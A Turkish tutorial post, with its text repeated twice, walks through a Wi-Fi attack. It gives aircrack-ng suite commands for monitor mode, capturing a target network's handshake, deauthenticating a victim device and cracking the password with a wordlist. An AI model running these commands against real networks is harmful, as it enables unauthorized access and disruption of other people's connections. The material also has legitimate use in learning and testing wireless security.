- 3 Ara 2022
- 134
- 2
- 80
Kablosuz Ağ Saldırıları ▷ deAuth, Handshake Yakalama ve Parola Kırma
Medium'da okumak için tıklayın
Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng
⚠ Bu içerik tamamen eğitim amaçlıdır. ☺
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu
Adaptörü Monitör Moduna Alma
Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.
Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.
Monitör moduna geçiş için:
Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Monitör moduna almak için:
Son olarak, monitör moda geçtiğini kontrol edelim;
Dinleme ve Handshake Yakalama
Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).
Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.
deAuth Saldırısı
Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.
Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma
Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Monitör Modundan Çıkış
Adaptörü tekrar Managed moduna almak için:
⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!
Medium'da okumak için tıklayın
Merhaba, bu yazımda Wi-Fi Hacking (Kablosuz Ağ Saldırıları) konusunu ele alacağım. Bu yazıda yapılacak saldırı metodolojisi şunlar;
- deAuth saldırısı yaparak bir cihazı ağdan düşürmek,
- Yakalanan handshake de bulunan hashli Wi-Fi parolasını wordlist ile kırmak.
Wi-Fi Hacking için bu yazıda kullandığım araçlar:
airmon-ng, airodump-ng, aireplay-ng, aircrack-ng
⚠ Bu içerik tamamen eğitim amaçlıdır. ☺
Kablosuz adaptör kurulumu hakkında bilgi almak için:
Kablosuz Adaptör Kurulumu
Adaptörü Monitör Moduna Alma
Kablosuz adaptör varsayılan olarak "Managed" modundadır. Wi-Fi Hacking için adaptörü "Monitör (izleme)" moduna almak gerekir.
Kod:
iwconfig
Bu komut, ağ kartınızın:
- Arayüz ismini (ör. wlan0,eth0),
- Modunu,
- Bağlı olduğu ağın ESSID'sini (isim bilgisi) gösterir.

Monitör moduna geçiş için:
Kod:
airmon-ng check
Bu komut, ağı kullanan işlemleri listeler (örneğin, NetworkManager ve wpa_supplicant). Bu işlemleri sonlandırmak için:
Kod:
airmon-ng check kill
Monitör moduna almak için:
Kod:
airmon-ng start wlan0
Son olarak, monitör moda geçtiğini kontrol edelim;
Kod:
iwconfig
Dinleme ve Handshake Yakalama
Monitör moduna geçtiğimize göre, ağları tarayabiliriz:
Kod:
airodump-ng wlan0
Bu komutla etrafınızdaki ağ noktalarını ve şu bilgileri görebilirsiniz:
- BSSID (modemin MAC adresi),
- CHANNEL ( WiFi'nin bulunduğu kanal numarası),
- ESSID (Wi-Fi ismi).
Hedef ağı belirledikten sonra aşağıdaki komutla dinlemeye alıyoruz
Kod:
airodump-ng -c <Kanal> --bssid <ModemMACAdresi> -w filename wlan0
Bu komut ile , saldircagamiz ağın handshake paketlerini yakalıyoruz.
deAuth Saldırısı
Ağdaki kullanıcılara deAuth saldırısı yaparak onları ağdan düşürebilir ve yeniden bağlanmaya çalıştıklarında handshake paketlerini yakalayabilirsiniz:
Kod:
aireplay-ng --deauth 10 -a <ModemMACAdresi> -c <CihazMACAdresi> wlan0
- `--deauth` parametresi, kaç paket gönderileceğini belirtir.
- `-a` parametresi, hedef router'ın MAC adresini girer.
- `-c` parametresi, hedef cihazın MAC adresini belirtir.


Yukarıda ki görselde handshake yakalandığı belirtiliyor.
Parola Kırma
Yakalanan handshake paketlerini kullanarak parola kırma işlemi için:
Kod:
aircrack-ng -b <ModemMACAdresi> -w <WordlistDosyası>.txt handshake.cap

Monitör Modundan Çıkış
Adaptörü tekrar Managed moduna almak için:
Kod:
airmon-ng stop wlan0
systemctl start NetworkManager
⚠ UYARI: Bu bilgiyi kötüye kullanmayınız!
Bu yazıda, deAuth saldırısı, handshake yakalama ve parola kırma işlemlerini elimden geldiğince anlattım. Umarım faydalı olur. Yakında bu saldırı türü için otomatik bir araç içeriği de paylaşacağım. İyi çalışmalar!